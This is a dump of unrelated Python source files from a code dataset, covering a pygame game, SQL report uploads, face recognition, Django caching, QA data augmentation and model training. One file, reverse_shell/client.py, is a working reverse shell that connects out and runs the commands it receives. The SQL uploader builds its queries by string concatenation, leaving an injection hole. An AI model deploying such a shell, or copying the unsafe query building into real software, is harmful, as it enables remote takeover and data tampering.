Происходит то же, что при столкновении с кораблём\n\t\t\t\tself._ship_hit()\n\t\t\t\tbreak\n\n\tdef _update_aliens(self):\n\t\t\"\"\"\n\t\tПроверяет, достиг ли флот края экрана,\n\t\tс последующим обновлением позиций всех пришельцев во флоте.\n\t\t\"\"\"\n\t\tself._check_fleet_edges()\n\t\tself.aliens.update()\n\n\t\t# Проверка коллизий \"пришелец - корабль\"\n\t\tif pygame.sprite.spritecollideany(self.ship, self.aliens):\n\t\t\tself._ship_hit()\n\n\t\t# Проверить, доюрались ли пришельцы до нижнего края экрана\n\t\tself._check_aliens_bottom()\n\n\tdef _arcade_frame(self):\n\t\t# Прорисовывет стилизованный арт в виде рамки\n\t\tself.frame = pygame.image.load('images/ai_bkg.bmp')\n\t\tself.screen.blit(self.frame, (0, 0))\n\n\nif __name__ == '__main__':\n\t# Создание экземпляра и запуск игры\n\tai = AlienInvasion()\n\tai.run_game()","sub_path":"Alien_invasion/alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":8920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"350206408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nuse by weekly report, upload data to sql express\n\n@author: WeiDengt\n\"\"\"\nimport pyodbc\nimport datetime\n\nclass ToMSSQL:\n def __init__(self):\n self.conn=pyodbc.connect('Driver={SQL Server};'\n 'Server=AES-RPT01\\SQLEXPRESS;'\n 'Database=WeeklyTKSummary;'\n 'Trusted_Connection=yes;')\n \n def insertCompletedTK(self,df):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from dbo.CompletedTickets\")\n \n for i in range(len(df)):\n #replace \"'\" and \"\"\" to \"\" before insert into database table\n \n title=str(df['TicketTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n values_str=\"('\"+df['FullName'][i]+\"','\"+df['TicketNumber'][i]+\"','\"+title+\"','\"+str(df['IssueType'][i])+\"','\"+df['SubIssueType'][i]+\"','\"+str(df['CreateDateTime'][i])+\"','\"+str(df['FirstAssignedDateTime'][i])+\"','\"+str(df['SLAFirstResponseDateTime'][i])+\"','\"+str(df['SLAResolvedDateTime'][i])+\"','\"+str(df['Status'][i])+\"','\"+str(df['Account'][i])+\"','\"+str(df['Queue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[CompletedTickets] ([FullName],[TicketNumber],[TicketTitle],[IssueType],[SubIssueType],[CreateDateTime],[FirstAssignedDateTime],[SLAFirstResponseDateTime],[SLAResolvedDateTime],[Status],[Account],[Queue]) VALUES \" +values_str \n cursor.execute(sqlstr)\n \n \n self.conn.commit()\n \n #self.conn.close()\n\n \n def insertAssignedTK(self,df):\n\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from AssignedTickets\")\n\n for i in range(len(df)):\n \n title=str(df['TicketTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+df['FullName'][i]+\"','\"+df['TicketNumber'][i]+\"','\"+title+\"','\"+df['Account'][i]+\"','\"+str(df['SLAStartDateTime'][i])+\"','\"+str(df['SLAFirstResponseDateTime'][i])+\"','\"+str(df['FirstAssignedDateTime'][i])+\"','\"+df['IssueType'][i]+\"','\"+df['SubIssueType'][i]+\"','\"+str(df['Status'][i])+\"','\"+str(df['Queue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[AssignedTickets] ([FullName],[TicketNumber],[TKTitle],[AccountName],[SLAStartDateTime],[SLAFirstResponseDate],[FirstAssigned],[Issue],[SubIssue],[Status],[Queue]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close()\n \n \n def insertIdleTK(self,df):\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from idleNotification\")\n\n for i in range(len(df)):\n \n title=str(df['TKTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+str(df['sentDate'][i])+\"','\"+df['Resource'][i]+\"','\"+df['TKNum'][i]+\"','\"+title+\"','\"+str(int(df['IdleHours'][i]))+\"')\"\n sqlstr=\"insert into [dbo].[idleNotification] ([sentDate],[Resource],[TKNum],[TKTitle],[IdleHours]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close() \n\n\n def insertSLANotMetTK(self,df):\n\n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from SLA_No\")\n\n for i in range(len(df)):\n \n values_str=\"('\"+df['TKNumber'][i]+\"','\"+df['AccountName'][i]+\"','\"+df['Priority'][i]+\"','\"+df['Status'][i]+\"','\"+df['ContactName'][i]+\"','\"+df['Source'][i]+\"','\"+df['Issue'][i]+\"','\"+df['SubIssue'][i]+\"','\"+str(df['FRDateTime'][i])+\"','\"+str(df['FRDueDateTime'][i])+\"','\"+str(int(df['FR_SLAMet'][i]))+\"','\"+str(df['SLVDateTime'][i])+\"','\"+str(df['SLVDueDateTime'][i])+\"','\"+str(int(df['Actual SLA Met Tickets'][i]))+\"','\"+str(df['QueueID'][i])+\"','\"+str(int(df['Final'][i]))+\"')\"\n sqlstr=\"insert into [dbo].[SLA_No] ([TKNumber],[AccountName],[Priority],[Status],[ContactName],[Source],[Issue],[SubIssue],[FRDateTime],[FRDueDateTime],[FR_SLAMet],[SLVDateTime],[SLVDueDateTime],[ActualSLAMetTickets],[QueueID],[Final]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n #self.conn.close()\n\n\n def insertWorkHoursTK(self,df):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from WorkedHours\")\n\n for i in range(len(df)):\n \n title=str(df['TKTitle'][i]).replace(\"'\",\"\")\n title=title.replace('\"','')\n \n values_str=\"('\"+df['FullName'][i]+\"','\"+str(df['HoursWorked'][i])+\"','\"+df['ProjectName'][i]+\"','\"+df['ProjectStatus'][i]+\"','\"+str(df['AccountName'][i])+\"','\"+title+\"','\"+str(df['TKNum'][i])+\"','\"+str(df['WorkedDate'][i])+\"','\"+df['Queue'][i]+\"','\"+df['Issue'][i]+\"','\"+str(df['SubIssue'][i])+\"')\"\n sqlstr=\"insert into [dbo].[WorkedHours] ([FullName],[HoursWorked],[ProjectName],[ProjectStatus],[AccountName],[TaskorTicketTitle],[TaskTicketNumber],[WorkedDate],[QueueName],[Issue],[SubIssue]) VALUES\" +values_str \n cursor.execute(sqlstr)\n #print(i)\n \n self.conn.commit()\n \n def updateDocControl(self,lastUpdate,timeDiff):\n \n cursor=self.conn.cursor()\n \n #del old records before insert new records\n cursor.execute(\"delete from DocControl\")\n \n values_str=\"('Title: ','Ticket Summary for Current week')\"\n sqlstr=\"insert into [dbo].[DocControl] ([DocControlItem],[Value]) VALUES\" +values_str \n cursor.execute(sqlstr)\n \n updatedAt=lastUpdate+datetime.timedelta(hours=timeDiff)\n last=str(updatedAt.year)+\"-\"+str(updatedAt.month)+\"-\"+str(updatedAt.day)+\" \"+str(updatedAt.hour)+\":00\"\n values_str=\"('Last Update:','\"+str(last)+\"')\"\n sqlstr=\"insert into [dbo].[DocControl] ([DocControlItem],[Value]) VALUES\" +values_str \n cursor.execute(sqlstr)\n self.conn.commit()\n #self.conn.close()\n\n## \n# def closeConn(self):\n# self.conn.close()\n \n","sub_path":"WeeklyOnlinePBI/Weekly_Report_toSQLEXPClassFile.py","file_name":"Weekly_Report_toSQLEXPClassFile.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"229254397","text":"import os\nimport socket\nimport subprocess\n\ns = socket.socket()\nhost = '192.168.105.102'\nport = 9998\ns.connect((host,port))\n\nwhile True:\n\tdata = s.recv(1024)\n\tif data[:2].decode(\"utf-8\") == 'cd':\n\t\tos.chdir(data[3:].decode(\"utf-8\"))\n\n\tif len(data) > 0:\n\t\tcommand = subprocess.Popen(data[:].decode(\"utf-8\"),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\toutput_bytes = command.stdout.read() + command.stderr.read()\n\t\toutput_string = str(output_bytes,\"utf-8\")\n\t\ts.send(str.encode(output_string + str(os.getcwd()) + '>' ))\n\t\tprint(output_string)\n\ns.close()","sub_path":"reverse_shell/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"572895959","text":"# Take2\n#second attempt at learning terminal commands\ndef demographics():\n name = input(\"What's your name? \")\n age = int(input(\"\\nHow old are you? \"))\n if(age >= 21):\n print(\"\\nGood. Proceed to the next processing phase:\")\n else:\n print(\"\\nYou're not old enough. Please exit the premises\")\n return\n return name\ndef specialties():\n print(\"\\nPlease enter your experience/specialties from the following list:\")\n print(\"\\nhand2hand\\tsabotage\\tdemolition\\tespionage\\nrecon\\tcyber\\tfirearms\\tsurveillance\\ninterrogation\")\n skills = str(input(\"\\nMy skills are: \"))\n#Still working on having specialties function distinguish different skills for work assignment\n if(skills == 'cyber' or 'surveillance'):\n#ineffective\n print(\"\\nYou will work in hq\")\n elif(skills == \"hand2hand\" or \"interrogation\" or \"demolition\" or \"recon\" or \"sabotage\"):\n#ineffective\n print(\"\\nThe field is where you belong\")\n else:\n print(\"Unfortunately, the CIA does not need your services\")\n return\n print(\"\\nThanks for choosing the Central Intelligence Agency as your place of occuptation\")\n \ndef experience():\n xp = int(input(\"How many years of experience do you have?\"))\n\ndef main():\n demographics()\n specialties()\n# experience()\nmain()\n","sub_path":"CIA_Vetting.py","file_name":"CIA_Vetting.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"616430379","text":"# USAGE\n# python eigenfaces.py --input caltech_faces --visualize 1\n\n# import the necessary packages\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.decomposition import PCA\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom skimage.exposure import rescale_intensity\nfrom face import load_face_dataset\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom imutils import build_montages\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\n\n# input argument\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", type=str, required=True,help=\"path to input directory of images\")\nap.add_argument(\"-f\", \"--face\", type=str,default=\"face_detector\",help=\"path to face detector model directory\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5,help=\"minimum probability to filter weak detections\")\nap.add_argument(\"-n\", \"--num-components\", type=int, default=150,help=\"# of principal components\")\nap.add_argument(\"-m\",\"--classifier\",type=str,default='svm')\nargs = vars(ap.parse_args())\n\n# load face detector\nprint(\"[INFO] loading face detector model...\")\nprototxtPath = os.path.sep.join([args[\"face\"], \"deploy.prototxt\"])\nweightsPath = os.path.sep.join([args[\"face\"],\"res10_300x300_ssd_iter_140000.caffemodel\"])\nnet = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n# load the image dataset\nprint(\"[INFO] loading dataset...\")\n(faces, labels) = load_face_dataset(args[\"input\"], net,minConfidence=0.8, minSamples=5)\nprint(\"[INFO] {} images in dataset\".format(len(faces)))\n\n# flatten 2d data into 1D data\npcaFaces = np.array([f.flatten() for f in faces])\n\n# encode the string labels as integers\nle = LabelEncoder()\nlabels = le.fit_transform(labels)\n\n# construct our training and testing split\nsplit = train_test_split(faces, pcaFaces, labels, test_size=0.25,stratify=labels, random_state=42)\n(origTrain, origTest, trainX, testX, trainY, testY) = split\n\n# compute the PCA (eigenfaces) representation of the data, then\n# project the training data onto the eigenfaces subspace\nprint(\"[INFO] creating eigenfaces...\")\npca = PCA(svd_solver=\"randomized\",n_components=args[\"num_components\"],whiten=True)\nstart = time.time()\ntrainX = pca.fit_transform(trainX)\nend = time.time()\nprint(\"[INFO] computing eigenfaces took {:.4f} seconds\".format(end - start))\n\n\n#model selection\nif args[\"classifier\"]=='svm':\n model = SVC(kernel=\"rbf\", C=10.0, gamma=0.001, random_state=42)\nelif args[\"classifier\"]=='knn':\n model=KNeighborsClassifier(n_neighbors=3,weights=\"distance\")\nelif args[\"classifier\"]=='lda':\n model=LinearDiscriminantAnalysis()\nelse:\n print('input correct classifier!')\n exit(-1)\n# train a classifier on the eigenfaces representation\nprint(\"[INFO] training classifier...\")\nmodel.fit(trainX, trainY)\n\n# evaluate the model\nprint(\"[INFO] evaluating model...\")\npredictions = model.predict(pca.transform(testX))\nprint('{} prediction :'.format(args[\"classifier\"]))\nprint(classification_report(testY, predictions,target_names=le.classes_))\n\n","sub_path":"eigenfaces.py","file_name":"eigenfaces.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"391679822","text":"import datetime\nimport hashlib\nimport logging\ntry:\n unicode = unicode\nexcept NameError: # 'unicode' is undefined => Python 3\n unicode = str\n bytes = bytes\n basestring = (str, bytes)\nelse: # 'unicode' exists => Python 2\n unicode = unicode\n bytes = str\n basestring = basestring\n\nfrom django.conf import settings\nfrom django.core.cache import cache as default_cache\nfrom django.core.cache.backends.base import InvalidCacheBackendError\nfrom django.db.models import Model\nfrom django.utils import encoding, translation\n\nfrom .compat import get_cache, DEFAULT_TIMEOUT\n\n# Look for an own cache first before falling back to the default cache\ntry:\n cache = get_cache('cache_machine')\nexcept (InvalidCacheBackendError, ValueError):\n cache = default_cache\n\n\nCACHE_PREFIX = getattr(settings, 'CACHE_PREFIX', '')\nFETCH_BY_ID = getattr(settings, 'FETCH_BY_ID', False)\nFLUSH = CACHE_PREFIX + ':flush:'\n\nlog = logging.getLogger('caching.invalidation')\n\n\ndef make_key(k, with_locale=True):\n \"\"\"Generate the full key for ``k``, with a prefix.\"\"\"\n key = encoding.smart_str('%s:%s' % (CACHE_PREFIX, k))\n if with_locale:\n key += encoding.smart_str(translation.get_language())\n # memcached keys must be < 250 bytes and w/o whitespace, but it's nice\n # to see the keys when using locmem.\n return hashlib.md5(key.encode('utf-8')).hexdigest()\n\n\ndef get_root_key(model):\n key = getattr(model, '__caching_root_key', None)\n if not key:\n # In case of inheritance, ensure the base model is always used as the root key.\n classes = [model]\n base_model = model\n while classes:\n class_ = classes.pop(0)\n if issubclass(class_, Model):\n base_model = class_\n classes += list(class_.__bases__)\n\n key = make_key('caching:root:%s' % hash(base_model))\n model.__caching_root_key = key\n return key\n\n\ndef cache_get(model, key, default=None):\n \"\"\"\n Retrieves the cache item for the given key.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n key: string\n default: anything or None\n\n returns: anything or None\n \"\"\"\n root_key = get_root_key(model)\n prefix = cache.get(root_key)\n if prefix is None:\n return default\n\n key = make_key(prefix + key)\n return cache.get(key, default=default)\n\n\ndef cache_set(model, key, value, timeout=None, root_key=None, root_timeout=None):\n \"\"\"\n Sets the cache item for the given key.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n key: string\n value: anything\n timeout: int or None\n root_timeout: int or None\n\n returns: None\n \"\"\"\n if root_timeout is None:\n root_timeout = DEFAULT_TIMEOUT\n if timeout is None:\n timeout = DEFAULT_TIMEOUT\n\n root_key = get_root_key(model)\n prefix = cache.get(root_key)\n if prefix is None:\n prefix = datetime.datetime.now().isoformat()\n cache.set(root_key, prefix, root_timeout)\n\n key = make_key(prefix + key)\n cache.set(key, value, timeout)\n\n\ndef cache_set_many(model, items, timeout=None, root_key=None, root_timeout=None):\n \"\"\"\n Sets multiple cache key-item pairs.\n A two-layer invalidation scheme is used; the model class is used to generate the final key.\n\n model: subclass of BaseModel\n items: {key (anythin): value (anything)}\n timeout: int or None\n root_timeout: int or None\n\n returns: None\n \"\"\"\n if root_timeout is None:\n root_timeout = DEFAULT_TIMEOUT\n if timeout is None:\n timeout = DEFAULT_TIMEOUT\n\n root_key = make_key('caching:root:%s' % hash(model))\n prefix = cache.get(root_key)\n if prefix is None:\n prefix = datetime.datetime.now().isoformat()\n cache.set(root_key, prefix, root_timeout)\n\n items = {make_key(prefix + key): value for key, value in items.items()}\n cache.set_many(items, timeout=timeout)\n\n\ndef cache_clear_root(model):\n \"\"\"\n Clears the root key for the given model.\n \"\"\"\n root_key = get_root_key(model)\n cache.delete(root_key)\n\n\ndef byid(obj):\n key = obj if isinstance(obj, basestring) else obj.cache_key\n return make_key('byid:' + key)\n","sub_path":"caching/invalidation.py","file_name":"invalidation.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"432252385","text":"import codecs\n\nfrom setuptools import setup, find_packages\n\npackages = find_packages(include=['bloomberg', 'bloomberg.*'])\n\nwith codecs.open('README.md','r','utf-8') as f:\n readme = f.read()\n\nsetup(\n name='bloomberg-api',\n author='Quassel',\n author_email='sandro.braun@quassel.li',\n version='0.1',\n description='Wrapper for the bloomberg API',\n keywords=['bloomberg', 'finance', 'data'],\n long_description=readme,\n packages=packages\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40010679","text":"from keras.preprocessing.image import ImageDataGenerator\nfrom keras.applications import MobileNetV2, ResNet50\nfrom keras.layers import Dense, Flatten, AveragePooling2D, Dropout\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard\nimport numpy as np\nimport argparse\nimport sys\n\n# Constant values\nN_SAMPLES_TRAIN = 498\nVAL_SPLIT = 0.2\nN_TRAIN_SAMPLES = int(N_SAMPLES_TRAIN * (1 - VAL_SPLIT) + 1)\nN_VAL_SAMPLES = int(N_SAMPLES_TRAIN * VAL_SPLIT)\nIMAGE_WIDTH = IMAGE_HEIGHT = 256\nBATCH_SIZE = 10\n\n# Argparse\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", choices=[\"MobileNetV2\", \"ResNet50\"], default=\"MobileNetV2\")\nargs = vars(ap.parse_args())\nmodel_type = args[\"model\"]\n\nprint(\"[INFO] Loading data...\")\n\ntrain_dir = \"dataset/train\"\n\n# All images will be rescaled by 1./255\ntrain_datagen = ImageDataGenerator(rescale=1. / 255, validation_split=VAL_SPLIT)\n#train_datagen = ImageDataGenerator(rescale=1. / 255, rotation_range=45, zoom_range=0.15, width_shift_range=0.2,\n# height_shift_range=0.2, horizontal_flip=True, validation_split=VAL_SPLIT)\n\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=(IMAGE_HEIGHT, IMAGE_WIDTH), shuffle=True,\n seed=13, batch_size=BATCH_SIZE, class_mode='binary',\n subset=\"training\")\nval_generator = train_datagen.flow_from_directory(train_dir, target_size=(IMAGE_HEIGHT, IMAGE_WIDTH), shuffle=True,\n seed=13, batch_size=BATCH_SIZE, class_mode='binary',\n subset=\"validation\")\n\nK.clear_session()\n\nprint(\"[INFO] Compiling model...\")\n# Model definition\nshape = (IMAGE_HEIGHT, IMAGE_WIDTH, 3)\nif model_type == \"MobileNetV2\":\n base_model = MobileNetV2(input_shape=shape, weights='imagenet', include_top=False)\nelif model_type == \"ResNet50\":\n base_model = ResNet50(input_shape=shape, weights='imagenet', include_top=False)\nelse:\n sys.exit(\"Error in model name\")\nhead_model = base_model.output\nhead_model = AveragePooling2D(pool_size=(4, 4))(head_model)\nhead_model = Flatten(name=\"flatten\")(head_model)\nhead_model = Dense(128, activation=\"relu\")(head_model)\nhead_model = Dropout(0.5)(head_model)\nhead_model = Dense(1, activation=\"sigmoid\")(head_model)\nmodel = Model(inputs=base_model.input, outputs=head_model)\nprint(model.summary())\n\n# Callbacks definitions\nlr_scheduler = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, min_lr=1e-9)\nearly_stop = EarlyStopping(monitor=\"val_loss\", mode='min', verbose=1, patience=20)\nif model_type == \"MobileNetV2\":\n mcp_save = ModelCheckpoint('MobileNetV2_wts.hdf5', save_best_only=True, monitor=\"val_loss\", mode='min')\nelif model_type == \"ResNet50\":\n mcp_save = ModelCheckpoint('ResNet50_wts.hdf5', save_best_only=True, monitor=\"val_loss\", mode='min')\ntb = TensorBoard(log_dir=\"logs\")\ncallbacks_list = [early_stop, mcp_save, lr_scheduler, tb]\n\n# Optimizer definition\nopt = Adam(lr=1e-5)\nmodel.compile(loss=\"binary_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\nprint(\"[INFO] Training model...\")\nhistory = model.fit_generator(train_generator, epochs=100, steps_per_epoch=N_TRAIN_SAMPLES // BATCH_SIZE,\n validation_data=val_generator, validation_steps=N_VAL_SAMPLES // BATCH_SIZE, verbose=2,\n callbacks=callbacks_list)\n\n# Best accuracy\n[best_loss, best_ep] = [np.min(history.history[\"val_loss\"]), np.argmin(history.history[\"val_loss\"])]\n\nprint(\"Best loss: {:.4f} Epoch: {}\".format(best_loss, best_ep))\n","sub_path":"pretrained.py","file_name":"pretrained.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"280419393","text":"import json\n# for now we import sys for fast research \nimport sys\nimport random\n\ndef main():\n\t# usage: python3 agumentate_policy.py policy_file.json positive_sub_sampling new.json\n\t# opening the json file\n\tfile = open(sys.argv[1], \"r\")\n\n\t# dictionary keys for better create documents\n\tfields = ['QUESTION_ID', 'QUESTION_TITLE', 'QUESTION_TEXT', 'DOCUMENT', 'ANSWER', 'START_OFFSET', 'END_OFFSET', 'ANSWERABLE', 'DOC_IDS']\n\n\t# return json object (list of dictionary)\n\tdata = json.load(file)\n\n\tprint(data.keys())\n\tprint(len(data[\"data\"]))\n\tprint(data[\"data\"][0].keys())\n\tprint(len(data[\"data\"][0][\"paragraphs\"]))\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0]))\n\tprint(data[\"data\"][0][\"paragraphs\"][0].keys())\t\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0][\"qas\"]))\t\n\tprint(data[\"data\"][0][\"paragraphs\"][0][\"qas\"][0].keys())\n\tprint(len(data[\"data\"][0][\"paragraphs\"][0][\"qas\"][0][\"answers\"]))\n\tc = 0\n\tfor p in data[\"data\"]:\n\t\tfor s in p[\"paragraphs\"]:\n\t\t\tfor qas in s[\"qas\"]:\n\t\t\t\tc += 1\n\tprint(c)\n\n\t\n\n\t# intial new data dictionary\n\tnew_data = {\"version\": data[\"version\"], 'data': []}\n\n\tfor sample in data[\"data\"]: # this is to traverse through the list of policies. \n\t# each policy contains a policy title and the paragaphs.\n\t\t# create new policy to append to new_data dictionary\n\t\tnew_policy = {'title': sample['title'], 'paragraphs': []}\n\t\tfor p in sample['paragraphs']: # each p is a dict {qas, index, context, and summary}\n\t\t\t# create new paragraph here to append to new_policy\n\t\t\tnew_p = {\"qas\": [], \"index\": p[\"index\"], \"context\": p[\"context\"], \"summary\": p[\"summary\"]}\n\t\t\tfor q in p[\"qas\"]: # now getting hold of each question for each p (paragaph) in paragraphS \n\t\t\t\t# first we need to add any question from original p[\"qas\"] to this\n\t\t\t\tif len(q[\"answers\"]) == 0:\n\t\t\t\t\tprint(\"found original empty!!!!!!!!\")\n\t\t\t\tnew_p[\"qas\"].append(q)\n\t\t\t\t# Then using random number here to make sure that we can get the 20%, 40%, 60%, 80% augmentation percentage\n\t\t\t\tif random.random() <= float(sys.argv[2]):\t\n\t\t\t\t\t# create new question (5, 5):\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"1\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (10, 10)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) + 5\n\t\t\t\t\t\tnew_start = ans[\"answer_start\"] + 5\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tif new_start < len(p[\"context\"]):\n\t\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\n\t\t\t\t\t# create new sample (-5, -5)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"2\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (-10, -10)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) - 5\n\t\t\t\t\t\tnew_start = max(0, ans[\"answer_start\"] - 5)\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\n\t\t\t\t\t# create new sample (-5, 0)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"3\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (-15, 0)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"])\n\t\t\t\t\t\tnew_start = max(0, ans[\"answer_start\"] - 5)\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\n\t\t\t\t\t# create new sample (0, -5)\n\t\t\t\t\tnew_q = {\"question\": q[\"question\"], \"type\": q[\"type\"], \"id\": q[\"id\"]+\"4\", \"answers\": []}\n\t\t\t\t\t# traverse through each answer for this question q, and move the window span (0, 15)\n\t\t\t\t\tfor ans in q[\"answers\"]:\n\t\t\t\t\t\tnew_end = ans[\"answer_start\"] + len(ans[\"text\"]) - 5\n\t\t\t\t\t\tnew_start = ans[\"answer_start\"]\n\t\t\t\t\t\t# create new answer for this questions\n\t\t\t\t\t\tnew_ans = {\"text\": p[\"context\"][new_start:new_end], \"answer_start\": new_start}\n\t\t\t\t\t\tnew_q[\"answers\"].append(new_ans)\n\t\t\t\t\tif len(new_q[\"answers\"]) != 0:\n\t\t\t\t\t\tnew_p[\"qas\"].append(new_q)\n\t\t\t\t\t# shuffle the question.\n\t\t\t\t\trandom.shuffle(new_p[\"qas\"])\n\t\t\t# append new paragraph to each new policy, going up one level\n\t\t\tnew_policy[\"paragraphs\"].append(new_p)\n\t\t# going up another level\n\t\t# append new policy to the new_data\n\t\tnew_data['data'].append(new_policy)\t\n\t\n\t# close the file\n\tfile.close()\n\n\tc = 0\n\tfor p in new_data[\"data\"]:\n\t\tfor s in p[\"paragraphs\"]:\n\t\t\tfor qas in s[\"qas\"]:\n\t\t\t\tc += 1\n\t\t\t\tif len(qas[\"answers\"]) == 0:\n\t\t\t\t\tprint(\"empty answer!!!!!!\")\n\tprint(c)\n\n\t# dump agumented data to new json file\n\twith open(sys.argv[3], 'w') as outfile:\n\t\tjson.dump(new_data, outfile)\n\n# call main for function to start:\nif __name__ == '__main__':\n\tmain()","sub_path":"agumentation/agumentate_policy.py","file_name":"agumentate_policy.py","file_ext":"py","file_size_in_byte":5070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"215545930","text":"from goods.Good import *\nfrom enums.GoodsType import *\nfrom enums.GoodsColour import *\n\n\nclass Cleaners(Good):\n goods_type = GoodsType.CLEANERS\n goods_colour = GoodsColour.BLUE\n\n def __init__(self, name, price, amount, id, manufacturer, goods_colour, goods_type):\n super().__init__(id, name, manufacturer, price, amount, goods_colour, goods_type)\n self.name = name\n self.price = price\n self.amount = amount\n\n def __str__(self):\n return \"Good type: \" + str(self.goods_type.value) + \" Price: \" + str(self.price) + \" Amount: \" + str(self.amount)\n","sub_path":"Lab4/goods/Cleaners.py","file_name":"Cleaners.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"326107374","text":"import requests\n# s = requests.session()\n# r = s.get(\"http://challenge01.root-me.org/programmation/ch1/\")\n#\n# div = r.text.split(\"\")\n#\n# recupUn1 = div[1].split(\"
    \")[0]\n# recup2Un1 = recupUn1.split(\"=\")[1]\n# recup3Un1 = recup2Un1.replace('','')\n# Un1 = recup3Un1.replace('','').strip()\n# Un1 = Un1.replace('[','(')\n# Un1 = Un1.replace(']',')')\n#\n# recupUn0 = div[1].split(\"
    \")[1]\n# Un0 = recupUn0.split(\"=\")[1].strip()\n#\n# recupIteration = div[1].split(\"
